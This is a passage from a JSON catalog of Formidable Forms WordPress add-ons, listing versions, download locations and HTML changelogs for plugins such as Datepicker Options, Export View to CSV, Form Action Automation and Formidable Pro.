Options\",\"slug\":\"datepicker-options\",\"version\":\"2.0\",\"new_version\":\"2.0\",\"location\":[\"fp.strategy11.com\\/releases\\/dates\\/formidable-dates-2.0.zip\"],\"excerpt\":\"Add more options to date fields in your forms for so only the dates you choose can be chosen.\",\"id\":20247260,\"released\":\"2018-07-30 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/datepicker-options\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/datepicker-options\\/\",\"changelog\":\"<h4>v2.0 - August 15, 2023<\\/h4>\\n<ul>\\n<li>New: Date calculations have now been added. Now a date field can calculate an offset date value based on another date value using data from other fields.<\\/li>\\n<li>New: A locale is now defined in the form builder so datepickers use the same datepicker locale that is used on the front end when selecting blackout dates.<\\/li>\\n<li>New: Added date validation when a minimum specific date value is specified with a date field as the target.<\\/li>\\n<li>Fix: Some inputs in datepicker field settings were appearing in the wrong position when using Firefox.<\\/li>\\n<\\/ul>\\n<h4>v1.06 - September 26, 2022<\\/h4>\\n<ul>\\n<li>New: Date pickers initialized using advanced Datepicker options add on will now use a prefixed class to avoid styling conflicts with other date pickers. This will help improve how month and year dropdowns appear for inline datepickers with the Astra theme on WooCommerce pages.<\\/li>\\n<li>Fix: Inline datepickers were getting stuck in an infinite loop and causing performance issues when using date formats that don\'t easily work with JavaScript.<\\/li>\\n<li>Fix: Date validation was failing for Minimum and Maximum rules that used upper case characters in the offset like + Days.<\\/li>\\n<\\/ul>\\n<h4>v1.05 - May 26, 2022<\\/h4>\\n<ul>\\n<li>New: Date field values will now be cleared on load for new entries when the value is not on an included day of the week, is set as a blackout date, or goes beyond the minimum or maximum date.<\\/li>\\n<li>New: Added more date field validation so submissions will be blocked with an error when submitting a date that is not on an included day of the week, is set as a blackout date, or goes beyond the minimum or maximum date.<\\/li>\\n<\\/ul>\\n<h4>v1.04 - January 3, 2022<\\/h4>\\n<ul>\\n<li>Fix: Date fields were breaking when the unique option was set and an add on option was also set (such as blackout dates or inline date picker).<\\/li>\\n<li>Fix: Inline date pickers would default to today when no default value was set.<\\/li>\\n<\\/ul>\\n<h4>v1.03 - March 8, 2021<\\/h4>\\n<ul>\\n<li>Fix: Date pickers were breaking inside repeaters.<\\/li>\\n<li>Fix: Prevent a warning that was appearing when importing forms with date values.<\\/li>\\n<li>Fix: Prevent a warning when formidable free is not active.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-dates\\/formidable-dates.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"datepicker\",\"is_new\":false},\"26596685\":{\"title\":\"Directory\",\"name\":\"Directory\",\"display_name\":\"Directory\",\"slug\":\"directory\",\"version\":\"1.0.01\",\"new_version\":\"1.0.01\",\"location\":[\"fp.strategy11.com\\/releases\\/directory\\/formidable-directory-1.0.01.zip\"],\"excerpt\":\"\",\"id\":26596685,\"released\":\"2020-06-29 00:00:00\",\"categories\":[\"Business+Views\",\"Solution\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/formidable-directory\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/wordpress-directory-plugin\\/\",\"changelog\":\"<h4>v1.0.01 - October 4, 2021<\\/h4>\\n<ul>\\n<li>Fix: The frm-letter-filter shortcode would always filter by lname instead of using the custom param option.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-directory\\/formidable-directory.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"beta\":{\"version\":\"100\",\"location\":[\"fp.strategy11.com\\/form-templates\\/business-directory.xml\"]},\"is_new\":false},\"20897348\":{\"title\":\"Export View to CSV\",\"name\":\"Export View to CSV\",\"display_name\":\"Export View to CSV\",\"slug\":\"export-view\",\"version\":\"1.08\",\"new_version\":\"1.08\",\"location\":[\"fp.strategy11.com\\/releases\\/export-view\\/formidable-export-view-1.08.zip\"],\"excerpt\":\"Easily create custom CSV files and allow users to export their data from the front-end of your site.\",\"id\":20897348,\"released\":\"2019-08-01 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/table-view-to-csv\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/export-view\\/\",\"changelog\":\"<h4>v1.08 - June 26, 2023<\\/h4>\\n<ul>\\n<li>Fix: Some admin pages, including the WooCommerce orders page, were broken because of a fatal error when Formidable Views was inactive. Now this plugin will no longer load when Formidable Views is unavailable.<\\/li>\\n<\\/ul>\\n<h4>v1.07 - June 15, 2023<\\/h4>\\n<ul>\\n<li>New: The utf8_encode function has been replaced as it is deprecated in PHP 8.2.<\\/li>\\n<li>New: Downloaded CSVs will now use the global CSV format setting instead of using the blog_charset option.<\\/li>\\n<li>Fix: Trying to download more than 5,000 rows at once would result in an error when memory limits were being exceeded.<\\/li>\\n<li>Fix: Some UI elements were not positioned properly on the global settings page.<\\/li>\\n<\\/ul>\\n<h4>v1.06 - June 13, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new frm_export_view_risky_characters filter that can be used to prevent an apostrophe from being prepended to cells starting with a +, = or @ character to prevent Spreadsheet applications from running formulas.<\\/li>\\n<li>Fix: The [entry_position] shortcode was resetting back to zero after every 30 rows when exporting as CSV.<\\/li>\\n<\\/ul>\\n<h4>v1.05 - October 28, 2021<\\/h4>\\n<ul>\\n<li>Performance: Reduce the memory usage required to load global settings for sites with thousands of views.<\\/li>\\n<li>Fix: Prevent empty rows that were sometimes being included when exporting a visual table view.<\\/li>\\n<\\/ul>\\n<h4>v1.04 - May 25, 2021<\\/h4>\\n<ul>\\n<li>Fix: Added a missing default parameter that was causing a deprecation message in PHP8.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-export-view\\/formidable-export-view.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"export table\",\"is_new\":false},\"28123662\":{\"title\":\"FAQ\",\"name\":\"FAQ\",\"display_name\":\"FAQ\",\"slug\":\"faq\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28123662,\"released\":\"2022-05-02 13:25:45\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/faq\\/\",\"changelog\":\"\",\"plugin\":\"faq\\/faq.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"326042\":{\"title\":\"Form Action Automation\",\"name\":\"Form Action Automation\",\"display_name\":\"Form Action Automation\",\"slug\":\"autoresponder\",\"version\":\"2.05\",\"new_version\":\"2.05\",\"location\":[\"fp.strategy11.com\\/releases\\/autoresponder\\/formidable-autoresponder-2.05.zip\"],\"excerpt\":\"Schedule email notifications, SMS messages, and API actions.\",\"id\":326042,\"released\":\"2016-09-21 00:00:00\",\"categories\":[\"Elite\",\"Marketing\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/schedule-autoresponder\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/autoresponder\\/\",\"changelog\":\"<h4>v2.05 - June 13, 2022<\\/h4>\\n<ul>\\n<li>Fix: Automation events were not getting unscheduled when an action or automation setting was deleted.<\\/li>\\n<li>Fix: Changes to automation settings were not saving for disabled actions.<\\/li>\\n<li>Fix: Automated entry creation events were getting triggered when saving drafts.<\\/li>\\n<\\/ul>\\n<h4>v2.04 - January 13, 2021<\\/h4>\\n<ul>\\n<li>Improve the way entry limits are tracked, and only store them when the limit is set. This saves database space and improves efficiency.<\\/li>\\n<li>Use local times for all the time stamps to make the logging and scheduled list more clear.<\\/li>\\n<li>When a form is duplicated, update the automation settings to match up with the duplicated fields.<\\/li>\\n<li>Fix: Prevent Zapier from triggering twice<\\/li>\\n<\\/ul>\\n<h4>v2.03 - May 30, 2019<\\/h4>\\n<ul>\\n<li>Update the settings layout a bit for Formidable v4.0<\\/li>\\n<li>Code: Add automation for plugin releases<\\/li>\\n<li>Code: Update for better WordPress code styling<\\/li>\\n<\\/ul>\\n<h4>v2.02 - November 7, 2018<\\/h4>\\n<ul>\\n<li>New: Allow user registration to be scheduled with the automation settings<\\/li>\\n<li>Fix: When a form action is disabled, don\'t trigger it with the automation<\\/li>\\n<\\/ul>\\n<h4>v2.01 - August 1, 2018<\\/h4>\\n<ul>\\n<li>Fix: Replace __DIR__ for php 5.2 support<\\/li>\\n<li>Fix: Prevent php warning with empty dates<\\/li>\\n<li>Fix: Switch to non-deprecated save_settings function<\\/li>\\n<li>A bunch of codestyling changes, messages for translators, and escape translated strings<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-autoresponder\\/formidable-autoresponder.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"automate, automation\",\"is_new\":false},\"168072\":{\"title\":\"Formidable API\",\"name\":\"Formidable API\",\"display_name\":\"Formidable API\",\"slug\":\"formidable-api\",\"version\":\"1.13\",\"new_version\":\"1.13\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-api\\/formidable-api-1.13.zip\"],\"excerpt\":\"Add a full forms API for forms, form fields, views, and entries. Then send submissions to other sites with REST APIs.\",\"id\":168072,\"released\":\"2016-06-08 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-api\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-api\\/\",\"changelog\":\"<h4>v1.14 - June 20, 2023<\\/h4>\\n<ul>\\n<li>New: Fields inside of a repeater are now also deleted when a repeater is deleted through the API endpoint.<\\/li>\\n<li>Fix: A fatal error would happen on front end pages when the Formidable Forms plugin was unavailable.<\\/li>\\n<li>Additional validation has been added when deleting a field using an invalid form id.<\\/li>\\n<li>References to old deprecated functions have been updated.<\\/li>\\n<\\/ul>\\n<h4>v1.13 - November 9, 2022<\\/h4>\\n<ul>\\n<li>Fix: API Actions were triggering a \\\"Call to a member function has_param\\\" fatal error with WordPress 6.1.<\\/li>\\n<li>Fix: Safari browsers were not loading a script in API script iframes as expected, resulting in small iframes without a proper height value set.<\\/li>\\n<\\/ul>\\n<h4>v1.12 - August 29, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new Character Set setting to API actions for setting the charset in the API request\'s Content-Type header.<\\/li>\\n<li>New: API format and character set are now passed when testing a connection to get more accurate test results.<\\/li>\\n<li>Fix: Error response from connection tests were missing a space.<\\/li>\\n<\\/ul>\\n<h4>v1.11 - March 16, 2022<\\/h4>\\n<ul>\\n<li>Fix: Fixed \\\"frm_js is not defined\\\" console error that was breaking some API short codes. Added safer checks when loading API short codes and removed jQuery dependency from API request.<\\/li>\\n<\\/ul>\\n<h4>v1.10 - February 23, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new form embed script available in the Embed Form modal. This script can be embedded on another site, including non-WordPress sites.<\\/li>\\n<li>New: [frm-api] shortcodes can now be easily copied from the Embed Form modal.<\\/li>\\n<li>New: Forms loaded from an API endpoint will now always submit with AJAX even if the setting is not turned on to prevent embedded forms from redirecting to the source site on submission.<\\/li>\\n<li>Fix: Creating and updating entries with the REST API was failing validation if the \\\"Check entries for spam using JavaScript\\\" option was turned on.<\\/li>\\n<li>Fix: Trying to load a form that does not exist with the REST API was not properly displaying a 404 error.<\\/li>\\n<li>Fix: Signature fields were not initializing in forms loaded from an API endpoint.<\\/li>\\n<li>Fix: Dropzone uploads were getting blocked with 403 errors in forms loaded from an API endpoint.<\\/li>\\n<li>Fix: Localized date pickers were not translating in forms loaded from an API endpoint.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-api\\/formidable-api.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28058862\":{\"title\":\"Formidable Apps + Forms Business\",\"name\":\"Formidable Apps + Forms Business\",\"display_name\":\"Formidable Apps + Forms Business\",\"slug\":\"formidable-views-business\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28058862,\"released\":\"2021-05-12 12:27:07\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-views-business\\/\",\"changelog\":\"\",\"plugin\":\"formidable-views-business\\/formidable-views-business.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28058860\":{\"title\":\"Formidable Apps + Forms Elite\",\"name\":\"Formidable Apps + Forms Elite\",\"display_name\":\"Formidable Apps + Forms Elite\",\"slug\":\"formidable-views-elite\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28058860,\"released\":\"2021-05-12 12:22:02\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-views-elite\\/\",\"changelog\":\"\",\"plugin\":\"formidable-views-elite\\/formidable-views-elite.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20834175\":{\"title\":\"Formidable Payments\",\"name\":\"Formidable Payments\",\"display_name\":\"Formidable Payments\",\"slug\":\"formidable-payments\",\"version\":\"1.14\",\"new_version\":\"1.14\",\"location\":[\"fp.strategy11.com\\/releases\\/payments\\/formidable-payments-1.14.zip\"],\"excerpt\":\"\",\"id\":20834175,\"released\":\"2018-11-06 12:08:25\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-payments\\/\",\"changelog\":\"\",\"plugin\":\"formidable-payments\\/formidable-payments.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"93790\":{\"title\":\"Formidable Pro\",\"name\":\"Formidable Pro\",\"display_name\":\"Formidable Pro\",\"slug\":\"formidable-pro\",\"version\":\"6.4.1\",\"new_version\":\"6.4.1\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-pro-6.4.1.zip\"],\"excerpt\":\"\",\"id\":93790,\"released\":\"2010-02-01 16:27:26\",\"categories\":[\"Basic\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-pro\\/\",\"changelog\":\"<h4>v6.4.2 - August 23, 2023<\\/h4>\\n<ul>\\n<li>New: Front end icons have been updated to no longer use font icons, significantly reducing the amount of data required when loading a form.<\\/li>\\n<li>Fix: Disabled checkbox options that were disabled after reaching a selection limit would not reset when the start over button was clicked.<\\/li>\\n<li>Fix: A warning would get logged in older versions of PHP when uploading a file in cases where the frm_upload_folder filter was used to return an empty path.<\\/li>\\n<li>Fix: A fatal error would occur on the form permissions section of form settings when the php_uname function was disabled and unavailable.<\\/li>\\n<li>Fix: Text would overflow past its contains in file upload fields when the Hello Elementor theme was active.<\\/li>\\n<li>Fix: Time fields were missing a space between the aria-label and the name attribute, causing issues when validating HTML.<\\/li>\\n<li>Fix: A PHP 8 deprecation message would get logged when viewing the applications page.<\\/li>\\n<\\/ul>\\n<h4>v6.4.1 - August 2, 2023<\\/h4>\\n<ul>\\n<li>New: Pagination has been added when viewing and editing entries on admin pages. This way it is easier to navigate to the previous or next entry.<\\/li>\\n<li>New: A confirmation message has now been added when deleting a repeater row to help avoid cases where form data is deleted accidentally.<\\/li>\\n<li>New: The generated Formidable CSS will now update when Formidable Pro is activated and deactivated. This prevents issues with missing style rules and larger CSS files than necessary.<\\/li>\\n<li>New: Radio button lookup fields are now grouped in a tabbable element with a radiogroup role for improved accessibility.<\\/li>\\n<li>New: Required attributes are defined on the radio button lookup and checkbox lookup field groups instead of on each input for improved accessibility.<\\/li>\\n<li>New: The show=label option is now supported in HTML field descriptions for fields with options.<\\/li>\\n<li>Fix: Application names were validating immediately when the rename pop up would open. The unique validation now only happens after the name is updated.<\\/li>\\n<li>Fix: Checkbox fields with image options were resetting to a Simple display format after loading the form builder again.<\\/li>\\n<li>Fix: A deprecated message would appear while getting the value for an [auto_id] shortcode when no form entries exist.<\\/li>\\n<\\/ul>\\n<h4>v6.4 - July 13, 2023<\\/h4>\\n<ul>\\n<li>New: The read only option has been added to Name fields.<\\/li>\\n<li>New: Rootlines can now be focused with the tab key and are labelled with the rootline progress including current page and total number of pages for improved accessibility.<\\/li>\\n<li>New: The active page number will now be displayed below the dropdown button in a rootline when there are too many pages to display every option.<\\/li>\\n<li>Fix: Conditional logic options targeting scale fields would always display the options from one to ten regardless of the defined options.<\\/li>\\n<li>Fix: File upload fields would display as \\\"Required upload size\\\" when no minimum value was set. This has been reverted to display as \\\"Maximum file size\\\" when no minimum is set.<\\/li>\\n<li>Fix: Custom currency options were not working for range fields in multiple page forms when the range field was not on the first page.<\\/li>\\n<li>Fix: Uploaded files with special characters would fail in some cases because because of a post_name length limit. These long file names will now be truncated in order to fit.<\\/li>\\n<li>Fix: Time fields would appearing too small with the Twenty Twenty-One theme. When Twenty Twenty-One is active, the proper padding is now applied so the arrow no longer overlaps the time value.<\\/li>\\n<\\/ul>\\n<h4>v6.3.3 - June 23, 2023<\\/h4>\\n<ul>\\n<li>Fix: Image options for checkbox fields were disabled incorrectly.<\\/li>\\n<\\/ul>\\n<h4>v6.3.2 - June 21, 2023<\\/h4>\\n<ul>\\n<li>New: File upload fields now support a new minimum file size setting.<\\/li>\\n<li>New: Additional validation has been added for required dynamic fields to prevent empty values.<\\/li>\\n<li>Fix: Conditional logic wasn\'t working on multiple page forms after starting over.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-pro\\/formidable-pro.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-772x250.png\"},\"search_terms\":\"\",\"is_new\":false},\"28029934\":{\"title\":\"Formidable Pro Basic\",\"name\":\"Formidable Pro Basic\",\"display_name\":\"Formidable Pro Basic\",\"slug\":\"formidable-basic2\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28029934,\"released\":\"2020-11-13 12:10:10\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-basic2\\/\",\"changelog\":\"\",\"plugin\":\"formidable-basic2\\/formidable-basic2.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"19366995\":{\"title\":\"Formidable Pro Business Package\",\"name\":\"Formidable Pro Business Package\",\"display_name\":\"Formidable Pro Business Package\",\"slug\":\"formidable-pro-small-business-package\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":19366995,\"released\":\"2017-09-01 12:09:09\",\"categories\":[\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-pro-small-business-package\\/\",\"changelog\":\"\",\"plugin\":\"formidable-pro-small-business-package\\/formidable-pro-small-business-package.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"19367001\":{\"title\":\"Formidable Pro Creator Package\",\"name\":\"Formidable Pro Creator Package\",\"display_name\":\"Formidable Pro Creator Package\",\"slug\":\"formidable-pro-professional-package\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":19367001,\"released\":\"2017-09-01 12:10:24\",\"categories\":[\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-pro-professional-package\\/\",\"changelog\":\"\",\"plugin\":\"formidable-pro-professional-package\\/formidable-pro-professional-package.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"19366992\":{\"title\":\"Formidable Pro Elite Package\",\"name\":\"Formidable Pro Elite Package\",\"display_name\":\"Formidable Pro Elite Package\",\"slug\":\"formidable-pro-enterprise-package\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":19366992,\"released\":\"2017-09-01 12:09:38\",\"categories\":[\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-pro-enterprise-package\\/\",\"changelog\":\"\",\"plugin\":\"formidable-pro-enterprise-package\\/formidable-pro-enterprise-package.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20896934\":{\"title\":\"Formidable Pro Plus\",\"name\":\"Formidable Pro Plus\",\"display_name\":\"Formidable Pro Plus\",\"slug\":\"formidable-basic\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":20896934,\"released\":\"2019-07-22 09:03:39\",\"categories\":[\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-basic\\/\",\"changelog\":\"\",\"plugin\":\"formidable-basic\\/formidable-basic.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"19367654\":{\"title\":\"Formidable Pro Single Site\",\"name\":\"Formidable Pro Single Site\",\"display_name\":\"Formidable Pro Single Site\",\"slug\":\"formidable-pro-single-site\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":19367654,\"released\":\"2017-09-01 13:36:16\",\"categories\":[\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-pro-single-site\\/\",\"changelog\":\"\",\"plugin\":\"formidable-pro-single-site\\/formidable-pro-single-site.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28058858\":{\"title\":\"Formidable Views + Forms Basic\",\"name\":\"Formidable Views + Forms Basic\",\"display_name\":\"Formidable Views + Forms Basic\",\"slug\":\"formidable-views-basic\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28058858,\"released\":\"2021-05-12 12:29:57\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-views-basic\\/\",\"changelog\":\"\",\"plugin\":\"formidable-views-basic\\/formidable-views-basic.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28058864\":{\"title\":\"Formidable Views + Forms Plus\",\"name\":\"Formidable Views + Forms Plus\",\"display_name\":\"Formidable Views + Forms Plus\",\"slug\":\"formidable-views-plus\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28058864,\"released\":\"2021-05-12 12:28:21\",\"categories\":[],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/formidable-views-plus\\/\",\"changelog\":\"\",\"plugin\":\"formidable-views-plus\\/formidable-views-plus.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28118399\":{\"title\":\"Geolocation\",\"name\":\"Geolocation\",\"display_name\":\"Geolocation\",\"slug\":\"geolocation\",\"version\":\"1.0\",\"new_version\":\"1.0\",\"location\":[\"fp.strategy11.com\\/releases\\/geo\\/formidable-geo-1.0.zip\"],\"excerpt\":\"Get more accurate data and make forms faster to complete with address autocomplete.\",\"id\":28118399,\"released\":\"2022-04-12 00:00:00\",\"categories\":[\"Business\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/geolocation\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/geolocation\\/\",\"changelog\":\"<h4>v1.0.1 - May 15, 2023<\\/h4>\\n<ul>\\n<li>Fix: Some versions of PHP would trigger an error because of an unexpected trailing comma.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-geo\\/formidable-geo.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20813244\":{\"title\":\"GetResponse\",\"name\":\"GetResponse\",\"display_name\":\"GetResponse\",\"slug\":\"getresponse-wordpress-plugin\",\"version\":\"1.05\",\"new_version\":\"1.05\",\"location\":[\"fp.strategy11.com\\/releases\\/getresponse\\/formidable-getresponse-1.05.zip\"],\"excerpt\":\"Collect leads in WordPress forms and automatically add them in GetResponse. Then trigger automatic emails and other GetResponse marketing automations.\",\"id\":20813244,\"released\":\"2018-09-06 00:00:00\",\"categories\":[\"Business\",\"Marketing\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/getresponse-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/getresponse-wordpress-plugin\\/\",\"changelog\":\"<h4>v1.05 - June 21, 2021<\\/h4>\\n<ul>\\n<li>New: Name fields will now automatically map the proper first and last name values when sending to GetResponse.<\\/li>\\n<li>Fix: Nothing would get sent when a user id field was set to something other than a name or email option.<\\/li>\\n<\\/ul>\\n<h4>v1.04 - October 2, 2019<\\/h4>\\n<ul>\\n<li>Allow 0 for the cycle start day<\\/li>\\n<li>Show more helpful messages in the form action if the GetResponse lists cannot be fetched<\\/li>\\n<li>Update the form action icon for 4.0<\\/li>\\n<li>Remove the debug mode option and use the Logging plugin 